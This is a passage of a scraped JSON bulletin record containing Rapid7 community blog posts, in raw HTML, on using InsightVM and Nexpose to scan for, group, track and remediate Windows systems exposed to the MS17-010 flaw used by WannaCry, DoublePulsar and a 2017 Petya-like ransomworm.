#3f98d4;\">CVE-2017-0146</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0147</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0148</span></a></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">5. Save the template and run a scan to identify all assets with MS17-010.</span></h2><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\">Creating a Dynamic Asset Group for MS17-010</h2><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #231f20;\">Now that you have your assets scanned, you may want to create a Dynamic Asset Group to report/tag off of that will update itself whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\">InsightVM</a> c</span><span style=\"font-size: 12pt; font-family: Arial; color: #231f20;\">onsole, just under the search button:</span></p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #231f20;\"><a href=\"https://lh6.googleusercontent.com/SOuRrmrhd5X9f64XMtrXQrZGCjf4qyxdeRRfg5aIK7ljeaqGO8wf15wrb5Nj5OaYu5UxW5BEIvrrI3u2ddSjaCYFrr6ly19-_eIkFpqDDFGMQfQm1iVmiV4i2V3S4nDmG9oJeG7u\"><img class=\"jive-image\" height=\"157\" src=\"https://lh6.googleusercontent.com/SOuRrmrhd5X9f64XMtrXQrZGCjf4qyxdeRRfg5aIK7ljeaqGO8wf15wrb5Nj5OaYu5UxW5BEIvrrI3u2ddSjaCYFrr6ly19-_eIkFpqDDFGMQfQm1iVmiV4i2V3S4nDmG9oJeG7u\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #231f20;\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\">Creating a DoublePulsar/WannaCry Dashboard</h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">Recently, Ken Mizota posted an article on how to build a custom dashboard to </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #3f98d4;\">track your exposure to exploits from the Shadow Brokers leak</span></a><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">. If you already did that, you're good to go! If you wanted to be specific to WannaCry and DoublePulsar, you could use this Dashboard filter:</span></p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Calibri; color: #000000; background-color: #f6f6f6;\">asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0101\" ORasset.vulnerability.title CONTAINS \"cve-2017-0146\"asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\"</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"font-size: 14pt; font-family: Arial; color: #231f20;\">Creating a SQL Query Export</span></h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #231f20;\">@00jay kindly posted this handy discussion for details on using the SQL export in InsightVM/Nexpose: </span><span style=\"font-size: 11.5pt; font-family: Arial; color: #3f98d4;\"><a class=\"jive-link-thread-small\" data-containerId=\"2004\" data-containerType=\"14\" data-objectId=\"9963\" data-objectType=\"1\" href=\"https://community.rapid7.com/thread/9963\">WannaCry - Scanning &amp; Reporting. This will also apply to DoublePulsar</a>.</span></p><h2 dir=\"ltr\"></h2><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\">Creating a Remediation Project for MS17-010</h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #231f20;\">In InsightVM, you can also create a remediation project for MS17-010 to track the progress of remediation live. To do this, go to the &ldquo;Projects&#8221; tab and click &ldquo;Create a Project&#8221;:</span></p><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #231f20;\"><a href=\"https://lh4.googleusercontent.com/Y-Kj2JX8i-J35zHYwGyxcmHvFVgL7rPui19ePSs5Zl_QRe85OZU2c-gjrk0gcPFSL5xxTMRibzKI91eLRiuYpVqckmb3Qa3MzIH3CbIyNsflCA_wNuc1GZmtQBxJFikXEDeKhdAo\"><img class=\"jive-image\" height=\"144\" src=\"https://lh4.googleusercontent.com/Y-Kj2JX8i-J35zHYwGyxcmHvFVgL7rPui19ePSs5Zl_QRe85OZU2c-gjrk0gcPFSL5xxTMRibzKI91eLRiuYpVqckmb3Qa3MzIH3CbIyNsflCA_wNuc1GZmtQBxJFikXEDeKhdAo\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in \"vulnerability.alternateIds &lt;=&gt; ( altId = \"ms17-010\" )\"</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh5.googleusercontent.com/-0n1zNDDrpFqs58I7XcahTGgFdgo9B3mnA7g2MGqgp2PgNIAP4UoMv5jadxCevG2rrjPkhlj8-ON14Mp4pK0bIUOTwzltWKpH9IaCCLsOd7vyPQ9AymVbRoAMkAdVC_wpqkn5xNI\"><img class=\"jive-image\" height=\"456\" src=\"https://lh5.googleusercontent.com/-0n1zNDDrpFqs58I7XcahTGgFdgo9B3mnA7g2MGqgp2PgNIAP4UoMv5jadxCevG2rrjPkhlj8-ON14Mp4pK0bIUOTwzltWKpH9IaCCLsOd7vyPQ9AymVbRoAMkAdVC_wpqkn5xNI\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now you can give this project a description and configure who is responsible for remediation, as well as access levels if you wish. If you have <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.atlassian.com%2Fsoftware%2Fjira\" rel=\"nofollow\" target=\"_blank\">JIRA</a>, you can also configure the automatic ticketing integration between InsightVM and JIRA to automatically assign tickets to the right folks.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you&#8217;ll be able to quickly scan for the vulnerability that enables both WannaCry and DoublePulsar infections. If you have any questions please don&#8217;t hesitate to let us know!</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on DoublePulsar, <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fdoublepulsar\" target=\"_blank\">please visit this page</a>. </span></p></div><!-- [DocumentBodyEnd:53f4c57c-eea0-4790-a908-f2f47ce880e1] -->", "title": "Protecting against DoublePulsar infection with InsightVM and Nexpose", "cvelist": ["CVE-2017-0101", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "_object_type": "robots.models.rss.RssBulletin", "viewCount": 150, "enchantments": {"score": {"value": 7.7, "vector": "NONE", "modified": "2017-06-24T01:16:32", "rev": 2}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0101", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96625", "SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2017-06-24T01:16:32", "rev": 2}}, "reporter": "Nathan Palanov", "bulletinFamily": "blog", "objectVersion": "1.5", "type": "rapid7community", "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://community.rapid7.com/community/nexpose/blog/2017/06/28/protecting-against-petya-like-ransom-worm-with-insightvm-and-nexpose", "references": [], "enchantments_done": [], "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "id": "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "history": [], "modified": "2017-06-28T00:06:12", "lastseen": "2017-06-28T03:17:01", "published": "2017-06-28T00:06:12", "description": "<!-- [DocumentBodyStart:736fb2f2-6580-4bdc-908e-ca4c7c801548] --><div class=\"jive-rendered-content\"><p dir=\"ltr\"><span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">A Petya-like ransomworm struck on June 27th 2017 and spread throughout the day, affecting organizations in several european countries and the US. It is believed that the ransomworm may achieve its initial infection via a malicious document attached to a phishing email, and then leverages the </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fsmb%2Fms17_010_eternalblue\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">EternalBlue </span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">and </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fdoublepulsar%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">DoublePulsar </span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">exploits to spread laterally. Once in place, it takes control of a system and encrypts files. As a reminder, ExternalBlue was leveraged for </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">WannaCry</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> as well, so we cannot stress enough the importance of patching against MS17-010 vulnerabilities</span><span style=\"font-size: 11pt; font-family: Arial; color: #ff0000;\">. </span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For the latest updates on this ransomworm, please see Rapid7&#8217;s </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fpetya%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">recommended actions</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">.</span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">To help customers understand their risk, we are sharing steps to create a targeted scan, dynamic asset group, and remediation project for identifying and fixing vulnerabilities; we will update as more information becomes available on other CVEs that may be used to spread the worm. As always, you can contact Rapid7 Support and your CSM with any questions, and if you haven&#8217;t done so already, </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">download a trial of InsightVM here</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Scan Template</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">The step-by-step guide to create an InsightVM/Nexpose scan template specifically to look for MS17-010 </span><span style=\"font-size: 11pt; font-family: Arial; color: #212121;\">is as follows:</span></p><p style=\"padding-left: 30px;\"><span style=\"font-size: 11pt; font-family: Arial; color: #212121;\">1.&#160; Under the Administration tab, go to Templates &gt; Manage Templates</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7924-67229/Admin-ManageTemplates.gif\"><img alt=\"Admin-ManageTemplates.gif\" class=\"image-1 jive-image\" height=\"687\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7924-67229/Admin-ManageTemplates.gif\" style=\"width: 620px; height: 298px;\" width=\"1430\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\">2. Copy the following template: Full Audit without Web Spider. Don't forget to give your copy a name and description.</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7924-67230/Admin-CopyScantemplate.gif\"><img alt=\"Admin-CopyScantemplate.gif\" class=\"image-2 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7924-67230/Admin-CopyScantemplate.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\">3. First uncheck \"Policies\". Click on Vulnerability Checks and then \"By Individual Checks\"</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7924-67231/Admin-ByIndividualCheck.gif\"><img alt=\"Admin-ByIndividualCheck.gif\" class=\"image-3 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7924-67231/Admin-ByIndividualCheck.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\">4. <span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Add Check &ldquo;</span><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">MS17-010</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">&#8221; and click Save:</span></span></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-size: 11pt; font-family: Arial;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7924-67232/Scantemplate-ms17-010.gif\"><img alt=\"Scantemplate-ms17-010.gif\" class=\"image-4 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7924-67232/Scantemplate-ms17-010.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p dir=\"ltr\" style=\"padding-left: 30px;\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should return checks that are related to MS17-010. The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0143</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0144</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0145</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0146</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0147</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" rel=\"nofollow\" target=\"_blank\">CVE-2017-0148</a></span></p><p style=\"padding-left: 30px;\">5. <span style=\"color: #000000; font-size: 11pt; font-family: Arial;\">Save the template and run a scan to identify all assets with MS17-010.</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Dynamic Asset Group</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">Now that you have scanned your assets, you may want to create a Dynamic Asset Group for reporting and tagging, which will update whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the </span><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">InsightVM</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\"> console, just under the search button:</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7924-67235/Screen+Shot+2017-06-27+at+3.55.40+PM.png\"><img alt=\"Screen Shot 2017-06-27 at 3.55.40 PM.png\" class=\"image-5 jive-image\" height=\"160\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7924-67235/Screen+Shot+2017-06-27+at+3.55.40+PM.png\" style=\"width: auto; height: auto;\" width=\"620\"/></a></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> <a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7924-67236/Screen+Shot+2017-06-27+at+3.42.28+PM.png\"><img alt=\"Screen Shot 2017-06-27 at 3.42.28 PM.png\" class=\"image-6 jive-image\" height=\"457\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7924-67236/Screen+Shot+2017-06-27+at+3.42.28+PM.png\" style=\"width: 620px; height: 385px;\" width=\"736\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Dashboard</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">Rapid7 will add a pre-built dashboard for the Petya-like ransomworm, like we did with the recent WannaCry and Samba vulnerabilities. </span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">Also, check out the new </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7908\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/06/13/live-threat-driven-prioritization\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">Threat Feed dashboard</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\"> which contains a view of your assets that are affected by actively targeted vulnerabilities including those leveraged by this ransomworm.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">If you want to build your own, </span><span style=\"font-size: 11pt; font-family: Arial; color: #303030;\">here&#8217;s </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">how you can build a custom dashboard</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #303030;\">, with examples taken from the Shadow Brokers leak.&#160; To find your exposure to MS17-010 vulnerabilities, you could use this Dashboard filter:</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: 'courier new', courier;\">asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0101\" OR asset.vulnerability.title CONTAINS \"cve-2017-0146\" OR asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\"</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a SQL Query Export</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">@00jay kindly posted this handy discussion for details on using the SQL export in InsightVM/Nexpose: </span><span style=\"font-size: 11pt; 